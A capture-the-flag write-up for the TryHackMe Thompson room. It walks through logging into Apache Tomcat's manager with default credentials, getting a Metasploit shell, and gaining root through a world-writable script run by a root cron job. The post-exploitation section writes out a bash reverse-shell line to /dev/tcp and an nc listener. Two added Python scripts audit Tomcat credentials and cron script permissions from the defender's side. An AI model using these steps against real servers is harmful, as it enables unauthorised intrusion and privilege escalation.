THM-Thompson-Writeup
Boot2root machine for the FIT and BSides Guatemala CTF
Find This Room: Thompson
If you want to get the Answer directly
Recon
There are 3 open ports: 22 (ssh), 8080 (http) and 8009 (ajp). Let's access the website on port 8080.
It's the default Apache Tomcat page. I checked the page source but found nothing valuable, so I'll scan for hidden directories with ffuf.
There are two suspicious folders: /host-manager and /manager.
First, let's access /manager.
Upon entry, a prompt appears requesting a username and password. Since I haven't figured them out yet, I click "Cancel." Surprisingly, the page that follows leads me to default credentials!
Well, let's try again with tomcat:s3cret.
Now we are logged in as a manager.
Trying the same credentials on /host-manager also works.
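The weakness here is a documented example credential left in the server's user database. As an added example (not part of the original writeup, and not Tomcat's own tooling), the script below audits a tomcat-users.xml file from the defender's side: it flags any account holding a manager-* or admin-* role whose password is on an assumed deny-list of well-known defaults or is shorter than a chosen minimum. The sample XML is constructed here; tomcat:s3cret is the pair the writeup found, the other two users are made up.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of Tomcat's conf/tomcat-users.xml. The
# tomcat:s3cret entry is the credential pair the writeup found on the box;
# the other two users are invented for this example.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Xk9#pQ2!vL7mZ4" roles="manager-script"/>
  <user username="status" password="abc" roles="manager-status"/>
</tomcat-users>
"""

# Assumed deny-list: values that appear in Tomcat's documentation and in the
# commented-out examples it ships, so they are the first thing anyone tries.
KNOWN_DEFAULT_PASSWORDS = {"s3cret", "tomcat", "admin", "password", ""}


def _local(tag):
    """Strip the XML namespace so <user> matches whether or not xmlns is set."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text, min_len=12):
    """Return [(username, reason)] for each user holding a manager-*/admin-*
    role whose password is a known default or shorter than min_len."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        # Only accounts that can reach the manager or host-manager apps matter here.
        if not any(r.startswith(("manager-", "admin-")) for r in roles):
            continue
        if password in KNOWN_DEFAULT_PASSWORDS:
            findings.append((name, "known-default-password"))
        elif len(password) < min_len:
            findings.append((name, "short-password"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {reason}")
```

Run it against the real conf/tomcat-users.xml on a server you administer; anything it reports should get a generated password, and the manager and host-manager applications should additionally be limited to admin networks (Tomcat's RemoteAddrValve in the app's context.xml does this) rather than exposed on every interface as on this box.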
Initial Access
We will use Metasploit to upload a reverse shell.
Then search for a Tomcat exploit:
search tomcat
use 18
In order to exploit, you need to set the Tomcat username and password (tomcat:s3cret), RHOSTS (the machine IP) and RPORT (8080). Also change LHOST to your VPN IP.
Remember to set these options before running the exploit (and set FingerprintCheck false).
After everything is set, run the exploit.
Post-Exploitation
Get User Flag
Now I have the meterpreter shell. Move around and get the first flag in /home/jack.
Now let's get root to get our final flag. Type "shell" to spawn a shell, then use Python to spawn a tty shell:
python -c 'import pty;pty.spawn("/bin/bash")'
There is a script called "id.sh". It writes the output of the id command to test.txt. Read the content of test.txt:
Get Root Flag
Now I know that there is a cronjob, and it runs id.sh as root. So let's check whether I can modify the content of this script.
Yes I can, because its permissions are 777! So let's modify the script to spawn a shell, and wait for the cronjob to run.
cat > id.sh <<EOF
#!/bin/bash
bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1
EOF
Check the content of id.sh again:
Now start a listener on your machine:
nc -lvnp <port>
Wait for about 1 min, and I'm root!
Boom, now we are root.
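The root cause of this privilege escalation is a root cron job executing a script that any user can edit. As an added example (not part of the original writeup), the script below does the audit a defender would run: it parses crontab-style lines, resolves every absolute path in each job's command, and reports regular files that are group- or world-writable, or (optionally) not owned by root when the job runs as root. The crontab text is constructed here, and build_demo_tree stages a throwaway directory containing an id.sh with mode 777 so the check can run offline; the `root` parameter points the audit at that staged tree instead of the live filesystem.

```python
import os
import re
import stat
import tempfile

# Constructed /etc/crontab-style content. The id.sh line mirrors the situation
# in the writeup: a job run as root that executes a script anyone can edit.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *   * * *   root    bash /home/jack/id.sh
@daily         root    /usr/local/bin/backup.sh --quiet
"""

# Either five time fields or an @shortcut, then the user, then the command.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(\S+)\s+(.+)$")


def cron_jobs(crontab_text):
    """Yield (user, command) for each job line, skipping comments and VAR=value lines."""
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2)


def audit_cron_scripts(crontab_text, root="", check_owner=True):
    """Return [(path, user, [problems])] for every absolute path in a job
    command that is a regular file writable by group/others or, when
    check_owner is set, owned by someone other than root for a root job.
    `root` lets the check run against a staged directory tree instead of /."""
    findings = []
    for user, command in cron_jobs(crontab_text):
        for tok in command.split():
            if not tok.startswith("/"):
                continue
            real = os.path.join(root, tok.lstrip("/")) if root else tok
            if not os.path.isfile(real):
                continue  # directories (run-parts targets) and missing files are out of scope here
            st = os.stat(real)
            problems = []
            if st.st_mode & stat.S_IWOTH:
                problems.append("world-writable")
            elif st.st_mode & stat.S_IWGRP:
                problems.append("group-writable")
            if check_owner and user == "root" and st.st_uid != 0:
                problems.append("not owned by root")
            if problems:
                findings.append((tok, user, problems))
    return findings


def build_demo_tree():
    """Stage a throwaway directory tree with the two scripts the sample crontab names."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    for rel, mode in (("home/jack/id.sh", 0o777), ("usr/local/bin/backup.sh", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\nid > /home/jack/test.txt\n")
        os.chmod(path, mode)  # chmod is not subject to umask, so 0o777 sticks
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    # check_owner=False because the staged files belong to whoever runs the demo.
    for path, user, problems in audit_cron_scripts(SAMPLE_CRONTAB, root=demo, check_owner=False):
        print(f"{path} (runs as {user}): {', '.join(problems)}  -> chmod 755 and chown root:root")
```

On a real host, feed it /etc/crontab and each file under /etc/cron.d with the default `root=""` and `check_owner=True`; the fix for anything it lists is the one the writeup's box was missing: scripts that root executes on a schedule must be owned by root and writable only by root (mode 755 or 700), and the same applies to every directory on the path to them.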
Get Final Flag
If you want to try the second way, which is generating a .war shell and accessing it via the browser, read the content here:
Happy Hacking